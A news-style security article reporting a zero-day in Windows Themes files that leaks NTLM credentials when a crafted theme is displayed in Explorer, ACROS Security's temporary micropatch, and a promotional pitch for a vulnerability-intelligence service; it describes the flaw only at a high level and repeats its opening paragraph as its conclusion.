In a recent investigation, cybersecurity firm ACROS Security uncovered a critical zero-day vulnerability within Windows Themes files, posing significant security risks to users. Despite Microsoft’s recent efforts to patch vulnerabilities, this flaw highlights ongoing threats to NTLM (NT LAN Manager) credentials. Researchers found that even fully updated systems, including the latest Windows 11 24##, remain susceptible to this dangerous exploit. The vulnerability enables attackers to steal NTLM credentials simply by displaying a malicious theme file in Windows Explorer. These findings underscore the persistent inadequacies in previous patches, calling into question Microsoft’s ability to fully secure user credentials.
The Inadequacy of Previous Patches
Despite Microsoft’s ongoing efforts to secure its Windows operating system, recent disclosures reveal that previous patches have been insufficient in preventing NTLM credential leaks. In January, Microsoft released the CVE-2024-21320 patch aimed at addressing this vulnerability. However, cybersecurity researchers from Akamai and ACROS Security identified that attackers can bypass the CVE-2024-21320 patch. This realization led to the identification of a new flaw, CVE-2024-38030, enabling attackers to exploit malicious theme files to obtain NTLM credentials remotely. This vulnerability allows attackers to send credentials to remote servers without any user interaction, posing a severe threat to security.
The nature of this vulnerability is particularly alarming because it spans multiple versions of Windows, from Windows 7 to Windows 11 24##. Various NTLM-based attacks can leverage this flaw, including relay and pass-the-hash techniques, which facilitate lateral movement within a network. Despite Microsoft’s efforts, these issues persist, leaving users exposed to potential compromise. The persistence of such vulnerabilities highlights a critical need for more robust and comprehensive security measures to protect NTLM credentials across all Windows platforms.
Mechanism of Exploitation
The zero-day vulnerability discovered by ACROS Security exploits a mechanism involving Windows Themes files that prompt NTLM authentication requests. When a malicious theme file is displayed in Windows Explorer, it triggers NTLM authentication requests to remote hosts. Without user intervention, these requests can send NTLM credentials to an attacker-controlled server, effectively compromising user security. To address this, ACROS Security introduced a temporary micropatch through their 0patch service, designed to block network paths within theme files and prevent unauthorized credential sharing.
Demonstrations conducted by ACROS Security highlighted the effectiveness of this micropatch. An unpatched Windows 11 24## system would send NTLM credentials to an attacker upon displaying a malicious theme file. However, a system equipped with the micropatch successfully blocked the credential leak, showcasing the temporary solution’s potential in mitigating this specific threat. Until Microsoft releases an official patch, users are advised to apply the micropatch provided by ACROS Security to safeguard their systems against remote NTLM credential theft.
Staying Ahead of Potential Threats
Staying ahead of potential threats in today’s evolving cybersecurity landscape is crucial for organizations and individuals alike. SOCRadar’s Vulnerability Intelligence service serves as a vital tool in identifying, assessing, and prioritizing vulnerabilities. This service provides real-time alerts and detailed insights, allowing security teams to focus their efforts on addressing the most critical threats. By staying informed about emerging vulnerabilities and zero-day exploits, organizations can allocate resources effectively to bolster their security posture.
The rapid evolution of cyber threats necessitates proactive measures and robust vulnerability intelligence. The recent discovery of this zero-day vulnerability in Windows Themes files underscores the importance of continuously monitoring and addressing potential security gaps. Organizations are encouraged to leverage comprehensive threat intelligence solutions and ensure regular updates to stay protected against ever-changing cyber threats. Employing a proactive approach to security will help mitigate risks associated with NTLM credential leaks and other vulnerabilities, safeguarding digital environments and sensitive data.
Conclusion
In a recent investigation, cybersecurity firm ACROS Security discovered a critical zero-day vulnerability within Windows Themes files, posing significant security threats to users. Despite Microsoft’s latest efforts to patch various vulnerabilities, this flaw highlights the ongoing risks to NTLM (NT LAN Manager) credentials. Researchers revealed that even fully updated systems, including the newest Windows 11 24##, are still vulnerable to this dangerous exploit. The vulnerability allows attackers to steal NTLM credentials merely by displaying a malicious theme file in Windows Explorer. These findings emphasize the persistent shortcomings in previous patches, raising questions about Microsoft’s ability to fully secure user credentials. ACROS Security’s discovery is a reminder of the ever-evolving nature of cybersecurity threats and the need for continuous vigilance and improvement. Even when companies like Microsoft work diligently to fix known issues, new vulnerabilities can emerge, underscoring the importance of advanced security measures and constant monitoring to protect user data effectively.
